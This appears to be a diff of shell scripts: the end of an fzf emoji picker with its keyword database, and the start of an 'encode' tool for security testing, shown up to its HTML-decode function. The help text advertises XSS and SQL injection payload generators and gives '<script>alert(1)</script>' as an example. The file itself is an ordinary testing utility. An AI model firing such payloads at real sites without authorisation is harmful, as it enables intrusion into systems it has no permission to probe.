🤤 drooling hungry desire want covet
|
||||||
|
😴 sleeping sleep zzz asleep tired snooze
|
||||||
|
😷 face mask sick ill medical doctor protection
|
||||||
|
🤒 thermometer sick ill fever temperature
|
||||||
|
🤕 head bandage hurt injured wounded ow
|
||||||
|
🤢 nauseated sick queasy gross disgusted
|
||||||
|
🤮 vomiting puke sick throw up barf
|
||||||
|
🤧 sneezing gesundheit achoo sick cold allergies
|
||||||
|
🥵 hot face heat sweating fever burning
|
||||||
|
🥶 cold face freezing frozen ice chilly
|
||||||
|
🥴 woozy dizzy drunk tipsy disoriented confused
|
||||||
|
😵 dizzy face knocked out stunned shocked
|
||||||
|
😵💫 spiral eyes dizzy hypnotized dazed confused
|
||||||
|
🤯 exploding head mind blown shocked amazed
|
||||||
|
🤠 cowboy hat yee haw western
|
||||||
|
🥳 party celebrating birthday festive celebration confetti
|
||||||
|
🥸 disguise glasses nose mustache incognito spy
|
||||||
|
😎 sunglasses cool awesome rad shades
|
||||||
|
🤓 nerd geek smart glasses studious
|
||||||
|
🧐 monocle fancy classy rich thinking posh
|
||||||
|
😕 confused puzzled uncertain huh what
|
||||||
|
🫤 diagonal mouth meh unsure uncertain
|
||||||
|
😟 worried anxious concerned nervous afraid
|
||||||
|
🙁 slightly frowning sad disappointed unhappy
|
||||||
|
☹️ frowning sad upset disappointed down
|
||||||
|
😮 open mouth shocked surprised wow oh
|
||||||
|
😯 hushed surprised quiet wow shocked
|
||||||
|
😲 astonished shocked amazed surprised stunned gasping
|
||||||
|
😳 flushed embarrassed shy blush awkward
|
||||||
|
🥺 pleading puppy eyes begging please sad mercy
|
||||||
|
🥹 holding tears grateful touched emotional moved
|
||||||
|
😦 frowning open mouth shocked worried concerned
|
||||||
|
😧 anguished distressed worried scared oh no
|
||||||
|
😨 fearful scared afraid anxious fear
|
||||||
|
😰 anxious sweat nervous worried stressed cold sweat
|
||||||
|
😥 sad relieved phew sweat disappointed but relieved
|
||||||
|
😢 crying sad tear upset depressed
|
||||||
|
😭 loudly crying sobbing bawling devastated
|
||||||
|
😱 screaming fear shocked scared horrified scream
|
||||||
|
😖 confounded frustrated scrunched upset confused
|
||||||
|
😣 persevering struggling persevere powering through
|
||||||
|
😞 disappointed sad unhappy let down dejected
|
||||||
|
😓 downcast sweat sad worried stressed defeated
|
||||||
|
😩 weary exhausted tired fed up frustrated
|
||||||
|
😫 tired exhausted fed up frustrated stressed
|
||||||
|
🥱 yawning tired bored sleepy boring exhausted
|
||||||
|
😤 triumph victory proud won huffing
|
||||||
|
😡 angry mad furious enraged pouting
|
||||||
|
😠 angry mad annoyed frustrated upset
|
||||||
|
🤬 cursing swearing profanity symbols angry fuck
|
||||||
|
😈 smiling horns devil mischievous naughty evil
|
||||||
|
👿 angry horns devil mad evil angry purple
|
||||||
|
💀 skull dead death dying funny died
|
||||||
|
☠️ skull crossbones poison danger pirate deadly
|
||||||
|
💩 pile poo poop shit turd crap
|
||||||
|
🤡 clown joker funny creepy circus
|
||||||
|
👹 ogre monster oni demon red scary
|
||||||
|
👺 goblin monster oni demon tengu red nose
|
||||||
|
👻 ghost boo spooky halloween phantom
|
||||||
|
👽 alien extraterrestrial et space ufo
|
||||||
|
👾 alien monster space invader video game retro
|
||||||
|
🤖 robot bot ai machine automation
|
||||||
|
😺 grinning cat happy cat smiling feline
|
||||||
|
😸 grinning cat smiling eyes happy feline
|
||||||
|
😹 cat tears joy laughing funny cat
|
||||||
|
😻 cat heart eyes love smiling adore
|
||||||
|
😼 cat wry smile smirking sly cat
|
||||||
|
😽 kissing cat love kiss affection
|
||||||
|
🙀 weary cat surprised shocked scared screaming
|
||||||
|
😿 crying cat sad tear upset
|
||||||
|
😾 pouting cat angry grumpy annoyed mad
|
||||||
|
🙈 see no evil monkey blind ignore cover eyes
|
||||||
|
🙉 hear no evil monkey deaf ignore cover ears
|
||||||
|
🙊 speak no evil monkey silence quiet shh cover mouth
|
||||||
|
💋 kiss lips kissing love smooch
|
||||||
|
💌 love letter heart mail valentine romance
|
||||||
|
💘 heart arrow cupid love valentine romance
|
||||||
|
💝 heart ribbon gift present love valentine
|
||||||
|
💖 sparkling heart love sparkle shine
|
||||||
|
💗 growing heart love expanding bigger
|
||||||
|
💓 beating heart love heartbeat pulse
|
||||||
|
💞 revolving hearts love two hearts circling
|
||||||
|
💕 two hearts love romance pair couple
|
||||||
|
💟 heart decoration love ornament purple white
|
||||||
|
❣️ heart exclamation love emphasis
|
||||||
|
💔 broken heart heartbreak sad breakup hurt
|
||||||
|
❤️🔥 heart fire burning love passion flames
|
||||||
|
❤️🩹 mending heart healing recovery bandaged
|
||||||
|
❤️ red heart love valentine romance classic
|
||||||
|
🩷 pink heart love soft cute gentle
|
||||||
|
🧡 orange heart love friendship care
|
||||||
|
💛 yellow heart love happiness friendship
|
||||||
|
💚 green heart love nature jealous
|
||||||
|
💙 blue heart love trust calm loyal
|
||||||
|
🩵 light blue heart love peace calm soft
|
||||||
|
💜 purple heart love compassion sensitivity
|
||||||
|
🤎 brown heart love earth natural
|
||||||
|
🖤 black heart dark sad evil goth
|
||||||
|
🩶 grey heart love neutral indifferent
|
||||||
|
🤍 white heart love pure clean innocent
|
||||||
|
💯 hundred perfect 100 score full keep it 💯
|
||||||
|
💢 anger symbol mad angry frustrated
|
||||||
|
💥 collision bang boom crash pow explosion
|
||||||
|
💫 dizzy stars sparkles dazed seeing stars
|
||||||
|
💦 sweat droplets water splash wet
|
||||||
|
💨 dashing dash wind fast smoke puff gone
|
||||||
|
🕳️ hole pit gap void empty opening
|
||||||
|
💬 speech balloon talk chat speaking
|
||||||
|
👁️🗨️ eye speech bubble witness i see attention
|
||||||
|
🗨️ left speech bubble chat talk dialog
|
||||||
|
🗯️ right anger bubble mad shout yell
|
||||||
|
💭 thought balloon thinking wondering daydream
|
||||||
|
💤 zzz sleeping sleep snore tired
|
||||||
|
👋 waving hand hi hello goodbye wave bye
|
||||||
|
🤚 raised back hand stop wait hold on
|
||||||
|
🖐️ hand fingers splayed five stop high five
|
||||||
|
✋ raised hand stop halt wait high five
|
||||||
|
🖖 vulcan salute spock star trek live long prosper
|
||||||
|
🫱 rightwards hand pointing right offer
|
||||||
|
🫲 leftwards hand pointing left offer
|
||||||
|
🫳 palm down hand drop dismiss
|
||||||
|
🫴 palm up hand offering receive give
|
||||||
|
🫷 leftwards pushing hand stop reject push
|
||||||
|
🫸 rightwards pushing hand stop reject push
|
||||||
|
👌 ok hand okay perfect good chef kiss
|
||||||
|
🤌 pinched fingers italian gesture what
|
||||||
|
🤏 pinching hand tiny small little bit
|
||||||
|
✌️ victory hand peace sign v two
|
||||||
|
🤞 crossed fingers luck wish hope good luck
|
||||||
|
🫰 hand index thumb snap click money pay
|
||||||
|
🤟 love you hand sign i love you
|
||||||
|
🤘 sign horns rock metal devil horns
|
||||||
|
🤙 call me hand phone shaka hang loose
|
||||||
|
👈 backhand index pointing left left that
|
||||||
|
👉 backhand index pointing right right that
|
||||||
|
👆 backhand index pointing up up above that
|
||||||
|
🖕 middle finger fuck you rude profanity flip off
|
||||||
|
👇 backhand index pointing down down below that
|
||||||
|
☝️ index pointing up one attention above
|
||||||
|
🫵 index pointing you your attention
|
||||||
|
👍 thumbs up good yes like approve agree
|
||||||
|
👎 thumbs down bad no dislike disapprove disagree
|
||||||
|
✊ raised fist power solidarity resistance punch
|
||||||
|
👊 oncoming fist punch bump fist bump bro
|
||||||
|
🤛 left facing fist punch bump fist bump
|
||||||
|
🤜 right facing fist punch bump fist bump
|
||||||
|
👏 clapping hands applause clap bravo good job
|
||||||
|
🙌 raising hands celebration praise yay hooray hallelujah
|
||||||
|
🫶 heart hands love support care fingers
|
||||||
|
👐 open hands hug embrace jazz hands
|
||||||
|
🤲 palms together pray please namaste dua
|
||||||
|
🤝 handshake deal agreement hello meeting shake
|
||||||
|
🙏 folded hands pray thank you please thanks namaste
|
||||||
|
✍️ writing hand writing write author pen
|
||||||
|
💅 nail polish nails beauty makeup manicure slay
|
||||||
|
🤳 selfie camera photo picture self portrait
|
||||||
|
💪 flexed biceps strong muscle strength flex gym
|
||||||
|
🦾 mechanical arm prosthetic cyborg robot strong
|
||||||
|
🦿 mechanical leg prosthetic cyborg robot
|
||||||
|
🦵 leg kick limb
|
||||||
|
🦶 foot step kick toe
|
||||||
|
👂 ear hearing listen sound
|
||||||
|
🦻 ear hearing aid deaf listen
|
||||||
|
👃 nose smell sniff scent
|
||||||
|
🧠 brain smart intelligent think mind
|
||||||
|
🫀 anatomical heart real heart organ medical
|
||||||
|
🫁 lungs breathing respiratory organ medical
|
||||||
|
🦷 tooth teeth dentist dental smile
|
||||||
|
🦴 bone skeleton fossil
|
||||||
|
👀 eyes looking watching see stare observe
|
||||||
|
👁️ eye looking watching see vision
|
||||||
|
👅 tongue lick taste silly
|
||||||
|
👄 mouth lips kiss kissing speaking
|
||||||
|
🫦 biting lip nervous anxious flirting
|
||||||
|
👶 baby infant newborn child young
|
||||||
|
🧒 child kid young boy girl
|
||||||
|
👦 boy child kid young male
|
||||||
|
👧 girl child kid young female
|
||||||
|
🧑 person human adult gender neutral
|
||||||
|
👱 blond person blonde hair fair
|
||||||
|
👨 man male adult guy dude gentleman
|
||||||
|
🧔 bearded person beard facial hair
|
||||||
|
🧔♂️ man beard facial hair
|
||||||
|
🧔♀️ woman beard facial hair
|
||||||
|
👨🦰 man red hair ginger
|
||||||
|
👨🦱 man curly hair
|
||||||
|
👨🦳 man white hair old elderly
|
||||||
|
👨🦲 man bald no hair
|
||||||
|
👩 woman female adult lady
|
||||||
|
👩🦰 woman red hair ginger
|
||||||
|
👩🦱 woman curly hair
|
||||||
|
👩🦳 woman white hair old elderly
|
||||||
|
👩🦲 woman bald no hair
|
||||||
|
🧓 older adult elderly senior old
|
||||||
|
👴 old man elderly grandfather senior
|
||||||
|
👵 old woman elderly grandmother senior
|
||||||
|
🙍 person frowning sad upset disappointed
|
||||||
|
🙍♂️ man frowning sad upset
|
||||||
|
🙍♀️ woman frowning sad upset
|
||||||
|
🙎 person pouting angry mad annoyed
|
||||||
|
🙎♂️ man pouting angry mad
|
||||||
|
🙎♀️ woman pouting angry mad
|
||||||
|
🙅 person gesturing no nope stop
|
||||||
|
🙅♂️ man gesturing no nope stop
|
||||||
|
🙅♀️ woman gesturing no nope stop
|
||||||
|
🙆 person gesturing ok okay yes
|
||||||
|
🙆♂️ man gesturing ok okay yes
|
||||||
|
🙆♀️ woman gesturing ok okay yes
|
||||||
|
💁 person tipping hand information sass
|
||||||
|
💁♂️ man tipping hand information
|
||||||
|
💁♀️ woman tipping hand information sass
|
||||||
|
🙋 person raising hand question attention pick me
|
||||||
|
🙋♂️ man raising hand question
|
||||||
|
🙋♀️ woman raising hand question
|
||||||
|
🧏 deaf person sign language deaf
|
||||||
|
🧏♂️ deaf man sign language
|
||||||
|
🧏♀️ deaf woman sign language
|
||||||
|
🙇 person bowing sorry thank you respect
|
||||||
|
🙇♂️ man bowing sorry respect
|
||||||
|
🙇♀️ woman bowing sorry respect
|
||||||
|
🤦 person facepalming facepalm frustrated duh disappointed
|
||||||
|
🤦♂️ man facepalming facepalm frustrated
|
||||||
|
🤦♀️ woman facepalming facepalm frustrated
|
||||||
|
🤷 person shrugging idk dunno shrug don't know whatever
|
||||||
|
🤷♂️ man shrugging idk dunno
|
||||||
|
🤷♀️ woman shrugging idk dunno
|
||||||
|
🧑⚕️ health worker doctor nurse medical
|
||||||
|
👨⚕️ man health worker doctor
|
||||||
|
👩⚕️ woman health worker doctor nurse
|
||||||
|
🧑🎓 student school college university
|
||||||
|
👨🎓 man student graduate
|
||||||
|
👩🎓 woman student graduate
|
||||||
|
🧑🏫 teacher professor educator
|
||||||
|
👨🏫 man teacher professor
|
||||||
|
👩🏫 woman teacher professor
|
||||||
|
🧑⚖️ judge law legal court justice
|
||||||
|
👨⚖️ man judge law
|
||||||
|
👩⚖️ woman judge law
|
||||||
|
🧑🌾 farmer agriculture crops
|
||||||
|
👨🌾 man farmer agriculture
|
||||||
|
👩🌾 woman farmer agriculture
|
||||||
|
🧑🍳 cook chef cooking
|
||||||
|
👨🍳 man cook chef
|
||||||
|
👩🍳 woman cook chef
|
||||||
|
🧑🔧 mechanic technician repair
|
||||||
|
👨🔧 man mechanic technician
|
||||||
|
👩🔧 woman mechanic technician
|
||||||
|
🧑🏭 factory worker industrial
|
||||||
|
👨🏭 man factory worker
|
||||||
|
👩🏭 woman factory worker
|
||||||
|
🧑💼 office worker business professional
|
||||||
|
👨💼 man office worker business
|
||||||
|
👩💼 woman office worker business
|
||||||
|
🧑🔬 scientist research lab
|
||||||
|
👨🔬 man scientist research
|
||||||
|
👩🔬 woman scientist research
|
||||||
|
🧑💻 technologist developer programmer coder hacker computer
|
||||||
|
👨💻 man technologist developer programmer
|
||||||
|
👩💻 woman technologist developer programmer
|
||||||
|
🧑🎤 singer performer music artist
|
||||||
|
👨🎤 man singer rockstar
|
||||||
|
👩🎤 woman singer rockstar
|
||||||
|
🧑🎨 artist painter creative
|
||||||
|
👨🎨 man artist painter
|
||||||
|
👩🎨 woman artist painter
|
||||||
|
🧑✈️ pilot aviation plane flight
|
||||||
|
👨✈️ man pilot aviation
|
||||||
|
👩✈️ woman pilot aviation
|
||||||
|
🧑🚀 astronaut space cosmonaut
|
||||||
|
👨🚀 man astronaut space
|
||||||
|
👩🚀 woman astronaut space
|
||||||
|
🧑🚒 firefighter fire emergency
|
||||||
|
👨🚒 man firefighter fire
|
||||||
|
👩🚒 woman firefighter fire
|
||||||
|
👮 police officer cop law enforcement
|
||||||
|
👮♂️ man police officer cop
|
||||||
|
👮♀️ woman police officer cop
|
||||||
|
🕵️ detective spy investigator sleuth
|
||||||
|
🕵️♂️ man detective spy
|
||||||
|
🕵️♀️ woman detective spy
|
||||||
|
💂 guard soldier royal british
|
||||||
|
💂♂️ man guard soldier
|
||||||
|
💂♀️ woman guard soldier
|
||||||
|
🥷 ninja stealth assassin martial arts
|
||||||
|
👷 construction worker builder hard hat
|
||||||
|
👷♂️ man construction worker builder
|
||||||
|
👷♀️ woman construction worker builder
|
||||||
|
🫅 person crown royalty monarch king queen
|
||||||
|
🤴 prince royalty nobility fairy tale
|
||||||
|
👸 princess royalty nobility fairy tale
|
||||||
|
👳 person turban wearing turban
|
||||||
|
👳♂️ man turban wearing
|
||||||
|
👳♀️ woman turban wearing
|
||||||
|
👲 person skullcap cap hat chinese
|
||||||
|
🧕 woman headscarf hijab muslim
|
||||||
|
🤵 person tuxedo formal wedding groom
|
||||||
|
🤵♂️ man tuxedo formal groom
|
||||||
|
🤵♀️ woman tuxedo formal
|
||||||
|
👰 person veil wedding bride marriage
|
||||||
|
👰♂️ man veil wedding groom
|
||||||
|
👰♀️ woman veil wedding bride
|
||||||
|
🤰 pregnant woman expecting baby
|
||||||
|
🫃 pregnant man trans expecting
|
||||||
|
🫄 pregnant person expecting baby
|
||||||
|
👼 baby angel cherub halo innocent
|
||||||
|
🎅 santa claus christmas saint nick father christmas
|
||||||
|
🤶 mrs claus christmas mother
|
||||||
|
🧑🎄 mx claus christmas gender neutral
|
||||||
|
🦸 superhero hero power super cape
|
||||||
|
🦸♂️ man superhero hero
|
||||||
|
🦸♀️ woman superhero hero
|
||||||
|
🦹 supervillain villain evil bad
|
||||||
|
🦹♂️ man supervillain villain
|
||||||
|
🦹♀️ woman supervillain villain
|
||||||
|
🧙 mage wizard witch magic sorcerer
|
||||||
|
🧙♂️ man mage wizard sorcerer
|
||||||
|
🧙♀️ woman mage witch sorceress
|
||||||
|
🧚 fairy magic pixie sprite wings
|
||||||
|
🧚♂️ man fairy magic
|
||||||
|
🧚♀️ woman fairy magic pixie
|
||||||
|
🧛 vampire dracula undead fangs blood
|
||||||
|
🧛♂️ man vampire dracula
|
||||||
|
🧛♀️ woman vampire dracula
|
||||||
|
🧜 merperson mermaid merman ocean sea
|
||||||
|
🧜♂️ merman triton ocean
|
||||||
|
🧜♀️ mermaid ariel ocean
|
||||||
|
🧝 elf fantasy magic legolas
|
||||||
|
🧝♂️ man elf fantasy
|
||||||
|
🧝♀️ woman elf fantasy
|
||||||
|
🧞 genie magic wish lamp djinn
|
||||||
|
🧞♂️ man genie magic
|
||||||
|
🧞♀️ woman genie magic
|
||||||
|
🧟 zombie undead walker brain dead
|
||||||
|
🧟♂️ man zombie undead
|
||||||
|
🧟♀️ woman zombie undead
|
||||||
|
🧌 troll internet monster ugly
|
||||||
|
💆 person getting massage spa relaxation
|
||||||
|
💆♂️ man getting massage spa
|
||||||
|
💆♀️ woman getting massage spa
|
||||||
|
💇 person getting haircut salon barber
|
||||||
|
💇♂️ man getting haircut barber
|
||||||
|
💇♀️ woman getting haircut salon
|
||||||
|
🚶 person walking walk stroll
|
||||||
|
🚶♂️ man walking walk
|
||||||
|
🚶♀️ woman walking walk
|
||||||
|
🧍 person standing stand up
|
||||||
|
🧍♂️ man standing stand
|
||||||
|
🧍♀️ woman standing stand
|
||||||
|
🧎 person kneeling kneel pray
|
||||||
|
🧎♂️ man kneeling kneel
|
||||||
|
🧎♀️ woman kneeling kneel
|
||||||
|
🧑🦯 person white cane blind visually impaired
|
||||||
|
👨🦯 man white cane blind
|
||||||
|
👩🦯 woman white cane blind
|
||||||
|
🧑🦼 person motorized wheelchair disabled
|
||||||
|
👨🦼 man motorized wheelchair disabled
|
||||||
|
👩🦼 woman motorized wheelchair disabled
|
||||||
|
🧑🦽 person manual wheelchair disabled
|
||||||
|
👨🦽 man manual wheelchair disabled
|
||||||
|
👩🦽 woman manual wheelchair disabled
|
||||||
|
🏃 person running run jog exercise sprint
|
||||||
|
🏃♂️ man running run jog
|
||||||
|
🏃♀️ woman running run jog
|
||||||
|
💃 woman dancing dance party salsa
|
||||||
|
🕺 man dancing dance party disco
|
||||||
|
🕴️ person suit levitating floating hovering
|
||||||
|
👯 people bunny ears party dancers
|
||||||
|
👯♂️ men bunny ears party
|
||||||
|
👯♀️ women bunny ears party
|
||||||
|
🧖 person steamy room sauna spa steam
|
||||||
|
🧖♂️ man steamy room sauna
|
||||||
|
🧖♀️ woman steamy room sauna
|
||||||
|
🧗 person climbing climb rock climbing
|
||||||
|
🧗♂️ man climbing climb
|
||||||
|
🧗♀️ woman climbing climb
|
||||||
|
🤺 person fencing sword sport
|
||||||
|
🏇 horse racing jockey racing equestrian
|
||||||
|
⛷️ skier skiing snow winter sport
|
||||||
|
🏂 snowboarder snowboarding snow winter
|
||||||
|
🏌️ person golfing golf sport
|
||||||
|
🏌️♂️ man golfing golf
|
||||||
|
🏌️♀️ woman golfing golf
|
||||||
|
🏄 person surfing surf wave beach
|
||||||
|
🏄♂️ man surfing surf wave
|
||||||
|
🏄♀️ woman surfing surf wave
|
||||||
|
🚣 person rowing boat row water
|
||||||
|
🚣♂️ man rowing boat row
|
||||||
|
🚣♀️ woman rowing boat row
|
||||||
|
🏊 person swimming swim pool water
|
||||||
|
🏊♂️ man swimming swim
|
||||||
|
🏊♀️ woman swimming swim
|
||||||
|
⛹️ person bouncing ball basketball sport
|
||||||
|
⛹️♂️ man bouncing ball basketball
|
||||||
|
⛹️♀️ woman bouncing ball basketball
|
||||||
|
🏋️ person lifting weights gym workout exercise
|
||||||
|
🏋️♂️ man lifting weights gym
|
||||||
|
🏋️♀️ woman lifting weights gym
|
||||||
|
🚴 person biking bike bicycle cycling
|
||||||
|
🚴♂️ man biking bike bicycle
|
||||||
|
🚴♀️ woman biking bike bicycle
|
||||||
|
🚵 person mountain biking bike trail
|
||||||
|
🚵♂️ man mountain biking bike
|
||||||
|
🚵♀️ woman mountain biking bike
|
||||||
|
🤸 person cartwheeling gymnastics cartwheel
|
||||||
|
🤸♂️ man cartwheeling gymnastics
|
||||||
|
🤸♀️ woman cartwheeling gymnastics
|
||||||
|
🤼 people wrestling wrestle sport
|
||||||
|
🤼♂️ men wrestling wrestle
|
||||||
|
🤼♀️ women wrestling wrestle
|
||||||
|
🤽 person playing water polo water sport
|
||||||
|
🤽♂️ man playing water polo
|
||||||
|
🤽♀️ woman playing water polo
|
||||||
|
🤾 person playing handball handball sport
|
||||||
|
🤾♂️ man playing handball
|
||||||
|
🤾♀️ woman playing handball
|
||||||
|
🤹 person juggling juggle circus performance
|
||||||
|
🤹♂️ man juggling juggle
|
||||||
|
🤹♀️ woman juggling juggle
|
||||||
|
🧘 person lotus position yoga meditation zen
|
||||||
|
🧘♂️ man lotus position yoga
|
||||||
|
🧘♀️ woman lotus position yoga
|
||||||
|
🛀 person taking bath bathtub shower relaxing
|
||||||
|
🛌 person bed sleeping rest sleep
|
||||||
|
🧑🤝🧑 people holding hands friends together couple
|
||||||
|
👭 women holding hands friends together couple
|
||||||
|
👫 woman man holding hands couple together
|
||||||
|
👬 men holding hands friends together couple
|
||||||
|
💏 kiss couple love romance kissing
|
||||||
|
👩❤️💋👨 kiss woman man couple love
|
||||||
|
👨❤️💋👨 kiss man man couple love gay
|
||||||
|
👩❤️💋👩 kiss woman woman couple love lesbian
|
||||||
|
💑 couple heart love together romance
|
||||||
|
👩❤️👨 couple heart woman man love
|
||||||
|
👨❤️👨 couple heart man man love gay
|
||||||
|
👩❤️👩 couple heart woman woman love lesbian
|
||||||
|
👨👩👦 family man woman boy parents child
|
||||||
|
👨👩👧 family man woman girl parents child
|
||||||
|
👨👩👧👦 family man woman girl boy parents children
|
||||||
|
👨👩👦👦 family man woman boy boy parents children
|
||||||
|
👨👩👧👧 family man woman girl girl parents children
|
||||||
|
👨👨👦 family man man boy gay parents
|
||||||
|
👨👨👧 family man man girl gay parents
|
||||||
|
👨👨👧👦 family man man girl boy gay parents
|
||||||
|
👨👨👦👦 family man man boy boy gay parents
|
||||||
|
👨👨👧👧 family man man girl girl gay parents
|
||||||
|
👩👩👦 family woman woman boy lesbian parents
|
||||||
|
👩👩👧 family woman woman girl lesbian parents
|
||||||
|
👩👩👧👦 family woman woman girl boy lesbian parents
|
||||||
|
👩👩👦👦 family woman woman boy boy lesbian parents
|
||||||
|
👩👩👧👧 family woman woman girl girl lesbian parents
|
||||||
|
👨👦 family man boy father son parent
|
||||||
|
👨👦👦 family man boy boy father sons
|
||||||
|
👨👧 family man girl father daughter
|
||||||
|
👨👧👦 family man girl boy father children
|
||||||
|
👨👧👧 family man girl girl father daughters
|
||||||
|
👩👦 family woman boy mother son parent
|
||||||
|
👩👦👦 family woman boy boy mother sons
|
||||||
|
👩👧 family woman girl mother daughter
|
||||||
|
👩👧👦 family woman girl boy mother children
|
||||||
|
👩👧👧 family woman girl girl mother daughters
|
||||||
|
🗣️ speaking head talking voice sound speaking
|
||||||
|
👤 bust silhouette profile person user
|
||||||
|
👥 busts silhouette people users group crowd
|
||||||
|
🫂 people hugging hug embrace support comfort
|
||||||
|
👣 footprints feet steps walking tracks"
|
||||||
|
|
||||||
|
# Copy stdin to the system clipboard, trying Wayland, X11, then macOS tools.
# Falls back to plain passthrough so the emoji is at least printed.
copy_to_clipboard() {
    if command -v wl-copy &>/dev/null; then
        wl-copy
    elif command -v xclip &>/dev/null; then
        xclip -selection clipboard
    elif command -v pbcopy &>/dev/null; then
        pbcopy
    else
        cat
    fi
}

if command -v fzf &>/dev/null; then
    if [[ $# -eq 0 ]]; then
        # Interactive mode with fzf.
        # '|| true' keeps 'set -e' from aborting when the picker is
        # cancelled (fzf exits 130 on ESC/Ctrl-C).
        selected=$(echo "$emojis" | fzf --height=60% --layout=reverse \
            --prompt="Select emoji: " \
            --preview='echo {}' \
            --preview-window=up:1:wrap) || true
        if [[ -n "$selected" ]]; then
            emoji_char=$(echo "$selected" | awk '{print $1}')
            echo -n "$emoji_char" | copy_to_clipboard
            echo "Copied: $emoji_char"
        fi
    else
        # Search mode: join all args into ONE pattern ("$*") so
        # 'emoji rolling eyes' works; "$@" would make grep treat the
        # extra words as filenames.
        echo "$emojis" | grep -i -- "$*" | head -20
    fi
else
    # Fallback without fzf - dump or filter the raw database.
    if [[ $# -eq 0 ]]; then
        echo "$emojis"
    else
        echo "$emojis" | grep -i -- "$*"
    fi
fi
|
||||||
316
scripts/encode
Executable file
316
scripts/encode
Executable file
|
|
@ -0,0 +1,316 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: encode
# Description: Encoding/Decoding Swiss Army Knife for security testing
# Usage: encode base64 "hello"          # Base64 encode
#        encode base64d "aGVsbG8="      # Base64 decode
#        encode url "hello world"       # URL encode
#        encode urld "hello%20world"    # URL decode
#        encode html "<script>"         # HTML entity encode
#        encode htmld "<script>"        # HTML entity decode
#        encode hex "hello"             # Hex encode
#        encode hexd "68656c6c6f"       # Hex decode
#        encode jwt <token>             # Decode JWT
#        encode hash md5 "password"     # Generate hash
#        pbpaste | encode base64        # Pipe from clipboard
#        encode xss "<script>"          # Multiple XSS encodings

VERSION="1.0.0"

# ANSI color / style escape sequences. These are stored as literal
# backslash sequences and rendered by 'echo -e' (or printf '%b').
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'   # reset / "no color"
|
||||||
|
|
||||||
|
# Print usage, supported operations, examples, and the security note.
# '%b' makes printf expand the \033 escapes stored in the color vars,
# matching what 'echo -e' did; '%s' is used where no escapes occur.
show_help() {
    printf '%b\n' "${BOLD}encode${NC} - Encoding/Decoding Swiss Army Knife v${VERSION}"
    printf '\n'
    printf '%b\n' "${BOLD}USAGE:${NC}"
    printf '%s\n' "    encode <operation> <input>"
    printf '%s\n' "    echo <input> | encode <operation>"
    printf '\n'
    printf '%b\n' "${BOLD}ENCODING OPERATIONS:${NC}"
    printf '%b\n' "    ${CYAN}base64${NC}      Base64 encode"
    printf '%b\n' "    ${CYAN}base64d${NC}     Base64 decode"
    printf '%b\n' "    ${CYAN}url${NC}         URL encode"
    printf '%b\n' "    ${CYAN}urld${NC}        URL decode"
    printf '%b\n' "    ${CYAN}html${NC}        HTML entity encode"
    printf '%b\n' "    ${CYAN}htmld${NC}       HTML entity decode"
    printf '%b\n' "    ${CYAN}hex${NC}         Hexadecimal encode"
    printf '%b\n' "    ${CYAN}hexd${NC}        Hexadecimal decode"
    printf '%b\n' "    ${CYAN}unicode${NC}     Unicode escape sequences (\\uXXXX)"
    printf '%b\n' "    ${CYAN}unicoded${NC}    Unicode unescape"
    printf '\n'
    printf '%b\n' "${BOLD}HASH OPERATIONS:${NC}"
    printf '%b\n' "    ${CYAN}hash md5${NC}     MD5 hash"
    printf '%b\n' "    ${CYAN}hash sha1${NC}    SHA1 hash"
    printf '%b\n' "    ${CYAN}hash sha256${NC}  SHA256 hash"
    printf '%b\n' "    ${CYAN}hash sha512${NC}  SHA512 hash"
    printf '\n'
    printf '%b\n' "${BOLD}SECURITY OPERATIONS:${NC}"
    printf '%b\n' "    ${CYAN}jwt${NC}         Decode JWT token (no verification)"
    printf '%b\n' "    ${CYAN}xss${NC}         Generate XSS payload variants"
    printf '%b\n' "    ${CYAN}sqli${NC}        Generate SQL injection variants"
    printf '\n'
    printf '%b\n' "${BOLD}EXAMPLES:${NC}"
    printf '%s\n' "    encode base64 \"hello world\""
    printf '%s\n' "    echo \"test\" | encode url"
    printf '%s\n' "    pbpaste | encode base64 | pbcopy"
    printf '%s\n' "    encode jwt eyJhbGc..."
    printf '%s\n' "    encode hash sha256 \"password\""
    printf '%s\n' "    encode xss \"<script>alert(1)</script>\""
    printf '\n'
    printf '%b\n' "${BOLD}SECURITY NOTE:${NC}"
    printf '%s\n' "    This tool is for authorized security testing and educational purposes only."
}
|
||||||
|
|
||||||
|
# Read input from argument or stdin
|
||||||
|
# Yield the tool's input on stdout: the joined arguments when any were
# given, otherwise whatever arrives on stdin (pipe-friendly).
get_input() {
    if (( $# == 0 )); then
        cat
    else
        echo "$*"
    fi
}
|
||||||
|
|
||||||
|
# Base64 operations
|
||||||
|
# Base64-encode the input (args or stdin) as a single unwrapped line.
# GNU base64 needs '-w 0' to disable line wrapping; BSD/macOS base64 has
# no -w, so fall back to a plain invocation there.
base64_encode() {
    # declare and assign separately so a get_input failure isn't masked (SC2155)
    local input
    input=$(get_input "$@")
    # printf instead of 'echo -n': safe even if the data starts with '-e'/'-n'
    printf '%s' "$input" | base64 -w 0 2>/dev/null || printf '%s' "$input" | base64
}
|
||||||
|
|
||||||
|
# Base64-decode the input (args or stdin).
# GNU coreutils uses '-d'; older BSD/macOS base64 uses '-D', hence the fallback.
base64_decode() {
    # declare and assign separately so a get_input failure isn't masked (SC2155)
    local input
    input=$(get_input "$@")
    printf '%s' "$input" | base64 -d 2>/dev/null || printf '%s' "$input" | base64 -D
}
|
||||||
|
|
||||||
|
# URL operations
|
||||||
|
# URL (percent) encode the input.
# The value is passed to Python via argv — the original interpolated it
# straight into the Python source, which broke on quotes/backslashes and
# allowed arbitrary code injection.
url_encode() {
    local input
    input=$(get_input "$@")
    python3 -c 'import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1]))' "$input"
}
|
||||||
|
|
||||||
|
# URL (percent) decode the input.
# Value passed via argv, not interpolated into the Python source (the
# original broke on quotes and was injectable).
url_decode() {
    local input
    input=$(get_input "$@")
    python3 -c 'import sys, urllib.parse; print(urllib.parse.unquote(sys.argv[1]))' "$input"
}
|
||||||
|
|
||||||
|
# HTML operations
|
||||||
|
# HTML-entity encode the input (escapes &, <, > and quotes).
# Value passed via argv: the original interpolated it into the Python
# source, so payloads containing quotes — the whole point of this tool —
# broke it or injected code.
html_encode() {
    local input
    input=$(get_input "$@")
    python3 -c 'import sys, html; print(html.escape(sys.argv[1]))' "$input"
}
|
||||||
|
|
||||||
|
# HTML-entity decode the input.
